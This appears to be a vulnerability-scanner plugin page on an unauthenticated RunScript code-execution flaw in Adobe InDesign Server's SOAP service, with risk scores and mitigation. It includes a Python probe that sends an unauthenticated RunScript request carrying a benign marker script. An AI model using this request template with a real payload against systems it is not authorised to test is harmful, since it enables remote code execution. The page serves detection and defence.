Adobe InDesign Server RunScript Arbitrary Command Execution

High | Nessus Plugin ID 65127

Synopsis

The Adobe InDesign Server SOAP service on the remote host lets unauthenticated clients execute arbitrary scripts, and through them arbitrary commands.

Description

The version of Adobe InDesign Server running on the remote host has an arbitrary command execution vulnerability. When the SOAP service is enabled, it accepts requests for the RunScript method without requiring authentication, and the method runs whatever script the request supplies: VBScript on Windows or AppleScript on Mac OS. A remote, unauthenticated attacker who can reach the SOAP port can therefore execute arbitrary code with the privileges of the InDesign Server process.
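The request shape below is an added example for this page, not Tenable's plugin code. It builds the unauthenticated SOAP RunScript call the description refers to and parses the reply, but the script it submits is a harmless ExtendScript expression that echoes a random marker rather than an OS command, which is enough to confirm that the method executes attacker-supplied script without credentials. The IDSP namespace, the RunScript/runScriptParameters/scriptLanguage/scriptText element names, the RunScriptResponse layout, the SOAPAction header and the default port 12345 are assumptions taken from the InDesign Server WSDL and the Metasploit module's defaults; none of them appear on the page.

```python
"""Benign unauthenticated RunScript probe for Adobe InDesign Server's SOAP service.

Added example; not Tenable's plugin code. Assumed (not stated on the page):
IDSP namespace, element names, response layout, SOAPAction header, default port.
"""
import secrets
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

IDSP_NS = "http://ns.adobe.com/InDesign/soap/"   # assumed from the WSDL
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
DEFAULT_PORT = 12345                              # assumed (Metasploit default)


def build_runscript_envelope(script_text: str, language: str = "javascript") -> bytes:
    """Build a SOAP 1.1 RunScript request. The request carries no credential
    at all, which is the finding: anyone who can reach the port may submit a
    script. Text is XML-escaped so the script cannot break the envelope."""
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}" xmlns:IDSP="{IDSP_NS}">'
        "<SOAP-ENV:Body><IDSP:RunScript><IDSP:runScriptParameters>"
        f"<IDSP:scriptLanguage>{escape(language)}</IDSP:scriptLanguage>"
        f"<IDSP:scriptText>{escape(script_text)}</IDSP:scriptText>"
        "</IDSP:runScriptParameters></IDSP:RunScript></SOAP-ENV:Body>"
        "</SOAP-ENV:Envelope>"
    )
    return body.encode("utf-8")


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree tag ('{ns}name' -> 'name')."""
    return tag.rsplit("}", 1)[-1]


def parse_runscript_response(xml_bytes: bytes) -> dict:
    """Pull errorNumber, errorString and scriptResult out of the reply by local
    name, so it does not matter how the server qualifies child elements."""
    root = ET.fromstring(xml_bytes)
    out = {"errorNumber": None, "errorString": "", "scriptResult": ""}
    for el in root.iter():
        name = _local(el.tag)
        if name == "errorNumber":
            out["errorNumber"] = int((el.text or "0").strip())
        elif name == "errorString":
            out["errorString"] = (el.text or "").strip()
        elif name == "scriptResult":
            # The value sits in a typed <data> child (assumed); gather all text.
            out["scriptResult"] = "".join(el.itertext()).strip()
    return out


def marker_script(marker: str) -> str:
    """ExtendScript whose last expression is the marker, so the server echoes
    it in scriptResult without touching the OS. Marker must be hex/alnum."""
    return f'var m = "{marker}"; m;'


def confirms_execution(response_xml: bytes, marker: str) -> bool:
    """True only if the server actually ran our script: error 0 and our marker
    echoed back. A SOAP fault or a non-zero error is not a confirmation."""
    r = parse_runscript_response(response_xml)
    return r["errorNumber"] == 0 and marker in r["scriptResult"]


def probe(host: str, port: int = DEFAULT_PORT, timeout: float = 10.0) -> bool:
    """Send the benign probe to a live server (only with authorization)."""
    marker = secrets.token_hex(8)
    req = urllib.request.Request(
        f"http://{host}:{port}/",
        data=build_runscript_envelope(marker_script(marker)),
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": f'"{IDSP_NS}RunScript"'},  # header value assumed
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return confirms_execution(resp.read(), marker)


# Constructed sample reply (not captured from a real server) in the layout the
# WSDL describes, so the parser can be exercised offline.
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
<SOAP-ENV:Body><IDSP:RunScriptResponse>
<errorNumber>0</errorNumber><errorString></errorString>
<scriptResult><data xsi:type="xsd:string">deadbeefcafef00d</data></scriptResult>
</IDSP:RunScriptResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
```

The probe deliberately uses the "javascript" language identifier and a marker echo rather than the VBScript or AppleScript path the description names: confirming that an unauthenticated RunScript call executes at all is the scan's job, and it needs no command execution to do so. A random marker per request keeps a cached or canned reply from being mistaken for execution, and a SOAP fault or non-zero errorNumber is treated as "not confirmed" rather than as a success.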

Solution

There is no known solution at this time. Because the RunScript method is only exposed while the SOAP service is enabled, disabling that service where it is not needed, or restricting network access to its port to trusted hosts, removes the unauthenticated attack path.

Plugin Details

Severity: High

ID: 65127

File Name: adobe_indesign_soap_runscript_rce.nasl

Version: 1.5

Type: remote

Family: CGI abuses

Published: 3/8/2013

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 7.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

CPE: cpe:/a:adobe:indesign

Excluded KB Items: Settings/disable_cgi_scanning

Exploit Available: true

Exploit Ease: Exploits are available

Exploited by Nessus: true

Vulnerability Publication Date: 11/16/2012

Exploitable With

Metasploit (Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution)

Reference Information

BID: 56574

Secunia: 48572